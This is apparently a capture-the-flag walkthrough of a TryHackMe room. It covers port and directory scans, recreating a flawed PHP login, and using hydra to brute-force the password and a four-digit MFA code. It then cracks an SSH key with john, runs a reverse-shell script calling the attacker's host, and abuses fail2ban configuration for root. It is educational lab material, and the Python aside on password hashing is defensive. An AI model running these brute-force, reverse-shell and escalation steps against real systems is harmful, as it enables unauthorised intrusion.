Room Link: https://tryhackme.com/room/biteme
Initial Scan
Kali
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u http://$VICTIM/console -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x phps
Finding username
Kali
echo 6a61736f6e5f746573745f6163636f756e74 | xxd -r -p
Recreating login
I merged configs.phps, functions.php and index.phps into a single index.php file. I made some modifications so that it could run when hosted locally without the MFA part of the code, so that I can then try to brute-force the credentials.
index.php
<?php
session_start();
$showError = false;
// Hex encoding of the only accepted username (decoded with xxd above).
define('LOGIN_USER', '6a61736f6e5f746573745f6163636f756e74');

function is_valid_user($user) {
    $user = bin2hex($user);
    return $user === LOGIN_USER;
}

// @fred let's talk about ways to make this more secure but still flexible
// Only the last three hex characters of the MD5 are compared, so any
// password whose MD5 ends in "001" is accepted (kept exactly as in the room).
function is_valid_pwd($pwd) {
    $hash = md5($pwd);
    return substr($hash, -3) === '001';
}

if (isset($_POST['user']) && isset($_POST['pwd'])) {
    if (is_valid_user($_POST['user']) && is_valid_pwd($_POST['pwd'])) {
        // Credentials are kept in plain cookies and the MFA step follows.
        setcookie('user', $_POST['user'], 0, '/');
        setcookie('pwd', $_POST['pwd'], 0, '/');
        header('Location: mfa.php');
        exit();
    } else {
        $showError = true;
    }
}
?>
<!doctype html>
<html lang="en">
<body class="text-center">
    <form action="index.php" method="post" class="form-signin" >
        <h1 class="h3 mb-3 font-weight-normal">Please sign in</h1>
        <input type="text" name="user" class="form-control" placeholder="Username" required>
        <input type="password" name="pwd" class="form-control" placeholder="Password" required>
        <button class="btn btn-lg btn-primary btn-block" type="submit">Sign in</button>
        <?php if ($showError): ?><p class="mt-3 mb-3 text-danger">Incorrect details</p><?php endif ?>
    </form>
</body>
</html>
Kali
echo MFA > mfa.php
php -S 127.0.0.1:81
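To show why the is_valid_pwd() check above matters, here is an added Python example (not from the room or this writeup): it ports the weak check, measures how often constructed random strings pass it (about 1 in 4096), and contrasts it with a salted PBKDF2 verification. The candidate strings and the PBKDF2 parameters are assumptions.

```python
import hashlib
import hmac
import os


def is_valid_pwd_weak(pwd: str) -> bool:
    """Port of the page's is_valid_pwd(): accepts any password whose MD5 ends in '001'."""
    return hashlib.md5(pwd.encode()).hexdigest()[-3:] == "001"


def weak_check_acceptance(sample_size: int, seed: int = 1) -> float:
    """Fraction of constructed candidates the weak check accepts.

    Candidates are 'cand-<seed>-<i>' (constructed, not real passwords).
    Three fixed hex digits give 16**3 = 4096 suffixes, so roughly 1/4096 of
    arbitrary strings pass; a wordlist run only has to hit one of them.
    """
    hits = sum(is_valid_pwd_weak(f"cand-{seed}-{i}") for i in range(sample_size))
    return hits / sample_size


def make_record(pwd: str, iterations: int = 200_000) -> dict:
    """Hardened form (hypothetical replacement): salted PBKDF2-HMAC-SHA256."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", pwd.encode(), salt, iterations)
    return {"salt": salt, "iterations": iterations, "digest": digest}


def verify_pwd(pwd: str, record: dict) -> bool:
    """Recompute the full digest and compare it in constant time."""
    digest = hashlib.pbkdf2_hmac("sha256", pwd.encode(), record["salt"], record["iterations"])
    return hmac.compare_digest(digest, record["digest"])


if __name__ == "__main__":
    rate = weak_check_acceptance(200_000)
    print(f"weak check accepts {rate:.6f} of random strings (1/4096 = {1/4096:.6f})")
    rec = make_record("violet")
    print("hardened verify:", verify_pwd("violet", rec), verify_pwd("Violet", rec))
```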
Bruteforce
Kali
hydra -l jason_test_account -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 81 http-post-form "/index.php:user=^USER^&pwd=^PASS^:F=Incorrect details"
Browser
Username: jason_test_account
Password: violet
Kali
python -c "with open('output.txt', 'w') as file: [file.write(f'{str(i).zfill(4)}\n') for i in range(10000)]"
Kali
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra/
./configure
make
make install
cd ..
thc-hydra/hydra -l jason_test_account -P output.txt $VICTIM http-post-form "/console/mfa.php:code=^PASS^:H=Cookie: PHPSESSID=hshqcs3n42r9qjs5b2850r9alt; user=jason_test_account; pwd=violet:F=Incorrect code" -T 64
LFI
Kali
chmod 600 id_rsa
/opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt
TCP/22 - SSH
Kali
ssh -i id_rsa jason@$VICTIM
Password: 1a2b3c4d
Lateral Movement
Victim
echo '#!/bin/bash' > shell.sh
# Double quotes so $KALI is expanded now, not left literal inside the script.
echo "sh -i >& /dev/tcp/$KALI/1337 0>&1" >> shell.sh
chmod +x shell.sh
Kali
Victim
sudo -u fred ./shell.sh
Get autocomplete
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo;fg
Privilege Escalation
Victim
cat /etc/fail2ban/jail.conf
Victim
ls -la /etc/fail2ban/action.d/iptables-multiport.conf
vi /etc/fail2ban/action.d/iptables-multiport.conf
Victim
sudo /bin/systemctl restart fail2ban
Now we need to enter bad passwords until we've triggered the ban action.
Kali
Victim